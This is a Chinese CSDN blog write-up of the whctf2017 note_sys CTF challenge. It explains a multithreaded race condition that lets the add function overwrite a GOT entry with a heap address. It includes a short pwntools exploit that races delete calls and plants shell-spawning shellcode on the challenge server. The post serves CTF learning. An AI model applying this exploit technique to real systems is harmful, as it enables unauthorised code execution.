whctf2017_note_sys(多线程条件竞争漏洞)

最新推荐文章于 2024-08-01 20:49:47 发布
最新推荐文章于 2024-08-01 20:49:47 发布
阅读量595 收藏 1
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 条件竞争
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106694944
版权
pwn 同时被 3 个专栏收录
161 篇文章 26 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏

whctf2017_note_sys(多线程条件竞争漏洞)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,delete功能另启了一个线程

函数里休眠了2s,在休眠之前,end_ptr减去了8

在add函数里,取end_ptr,然后往其指向的地方写一个堆地址。

由此,我们可以多次调用delete,每次end_ptr都会减去8并且休眠2s再做判断,这就存在条件竞争,我们可以在判断之前让end_ptr指向got表,然后add的时候就能往got表里写一个堆地址,我们在堆里布下shellcode即可。

#coding:utf8
from pwn import *

#sh = process('./note_sys')
sh = remote('node3.buuoj.cn',29522)
context(os='linux',arch='amd64')
def add(content):
   sh.sendlineafter('choice:','0')
   sh.sendlineafter('input your note, no more than 250 characters',content)

def delete():
   sh.sendlineafter('choice:','2')
#条件竞争

for i in range(20):
   delete()

add(asm(shellcraft.sh()))

sh.interactive()

 

ha1vk
关注
专栏目录
error: ‘PyArray_Descr {aka struct _PyArray_Descr } ‘ has no member named ‘elsize‘解决方案
weixin_43178406的博客
07-25 6万+
本文主要介绍了error: 'PyArray_Descr {aka struct _PyArray_Descr } ’ has no member named 'elsize’解决方案,希望能对使用Python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
采用_beginthread/_beginthreadex函数创建多线程
热门推荐
cbNotes的专栏:不积硅步,无以至千里;不积小流,无以成江海!
12-19 1万+
1、CRT简介: CRT: (C Runtime Library)即C运行时库,是系统运行的基础,包含了c常用的函数集(如:printf,malloc,strcpy等),为运行main做了初始化环境变量、堆、io等资源,并在结束后清理。 在Windows环境下,VC提供的 C run-time library又分为动态运行时库、静态运行时库、多线程、单线程、调试版本(Debug)、发行版本(R
CTF特训营》web部分读书笔记(六)条件竞争
闵行小鱼塘
07-31 520
继续阅读《CTF特训营》web部分,本节是条件竞争
XCTF 4th-WHCTF-2017——Note_sys
05-11 417
64位程序,没有开启NX  #条件竞争 程序逻辑 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <unistd.h> 4 #include <pthread.h> 5 #include <time.h> 6 #includ...
CTF文件上传 与 条件竞争上传
最新发布
2301_81556781的博客
08-01 554
htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。
一个多线程的隐患
anlanghui8293的博客
06-25 107
今天查看项目代码的时候发现下面这段代码: 代码 1 internal MoveTask Dequeue(string host) 2 { 3 if (host == null) 4 throw new ArgumentNullException("host"); 5 6 ...
漏洞挖掘——多线程中的堆内存结构
董哥的黑板报
07-29 1213
一、主线程的堆内存结构 当程序只有一个线程(主线程)时,程序申请的堆是在堆区的(heap) 如果通过查看内存段信息:如果heap与程序的data段相邻,则堆块是有brk系统调用获得的,否则是由mmap系统调用申请的(mmap不与data段相邻) 演示案例 #include <unsitd.h> #include <malloc.h> int main() { ...
CTF条件竞争
夏日 の blog
02-10 2690
简介 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。 个人理解 通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。 竞争...
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2706
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
dpdk_lcore_note_DPDK_lcore_学习笔记
Andrew Yang's Note
02-16 2733
DPDK 16.07 lcore学习笔记 文档保留了 markdown 格式。可以转为纯文本格式,方便在其他编辑器中使用语法高亮阅读代码。 文档行文主要是提纲式的。如果阅读过程发现缺少了方向。请立刻回到章节的开首处,查询总体的函数调用图。 1. DPDK核绑定的全局概览 DPDK核绑定的相关函数,都集中在rte_eal_init()函数中调用: 其中主要分为六部分: 检测所有的cpu。 解释...
Halcon多线程处理
大樱桃的博客
05-28 1万+
Halcon多线程处理 Halcon中自带多线程处理算子,使用起来非常简单。下面就对线程算子进行简单的介绍。首先介绍用于多线程处理的两个算子,par_start 和par_join()。 Halcon的帮助文件中对par_start 是这样介绍的: To start a new thread, prefix the corresponding operator or procedure cal...
多线程安全问题
qq_41490873的博客
02-06 220
什么时候多线程会出现问题
WEB-CTF 条件竞争
iamsongyu的博客
10-24 6333
如何来形容这个类型的问题呢,就像是幼儿园发糖吃,每个人只能拿一块,但是如果你跟别人一起再拿一次老师也没办法分辨,毕竟一群小朋友老师也没办法分辨手和对应的人。 关于部分的Burpsuite使用的知识,在前面的https://blog.csdn.net/iamsongyu/article/details/82989478中已经讲了,就不在赘述   这是一个好文章,从上边摘抄和借鉴了不少 htt...
入门分析,多线程竞争为何不安全
01-19 479
简介: 入门级别讲解,分析多线程竞争同一共享资源,运行结果不符预期的原因;故书一简例,讲解何谓 非线程安全 ?以及使用 atomic 和 mutex 来解决此缺陷场景,最终 线程安全 获得预期结果。 文章目录受众场景分析解决方案一(atomic)方案二(mutex)额外探索源码提示 本文初发于 “偕臧的小站”,同步转载于此。 受众 有基本的多线程理论知识,但未曾深入研究 “运行不符预期结果” 的萌新?亦或对多线程未曾了解,道听途说、知识点模糊,实际不甚理解原理的读者。都是本文的最佳读者。若已早熟
网络安全-条件竞争(《CTF特训营》第7章复现)
关注网络安全、云原生安全
12-18 1767
举例 前期准备 在phpStudy的WWW目录下,写两个文件。 标题 condition_race.php内容: <?php $cnt=file_get_contents("count.txt"); //count.txt的初始内容为0 $cnt+=1; echo "This site was visited $cnt times."; file_put_contents("count.txt",$cnt); ?> count.txt内容: 0 打开ph...
网络安全-条件竞争(《CTF特训营》第7章复现)_bp进行条件竞争(1)
2401_84254087的博客
05-02 70
条件竞争,发生在多个线程或进程在读写一个共享数据时,结果依赖于他们执行的相对时间的情形。
条件竞争和恶性条件竞争
weixin_30566111的博客
09-30 312
竞争条件指多个线程或者进程在读写一个共享数据时结果依赖于它们执行的相对时间的情形。 竞争条件发生在当多个进程或者线程在读写数据时,其最终的的结果依赖于多个进程的指令执行顺序。 例如:考虑下面的例子 假设两个进程P1和P2共享了变量a。在某一执行时刻,P1更新a为1,在另一时刻,P2更新a为2。 因此两个任务竞争地写变量a。在这个例子中,竞争的“失败者”(最后更新的进程)决定了...
170916 逆向-WHCTF(BabyRe/CrackMe)
whklhhhh的博客
09-16 3730
1625-5 王子昂 总结《2017年9月16日》 【连续第349天总结】 A. XCTF-Reverse B.CRACKME无壳,C++ 打开是一个简单的输入框和注册按钮 点击注册按钮会弹框“哎,注册码错了,你得换个新的哟!”IDA没有main函数,看起来是MFC写的 查找字符串、断GetDlgText等API都没有结果 说明字符串都被加密过了IDA逐个函数查找,发现有两个函数调用了
php条件竞争漏洞,CTF中的条件竞争漏洞
weixin_36304806的博客
03-20 535
条件竞争是沃特?敲黑板,定义:竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值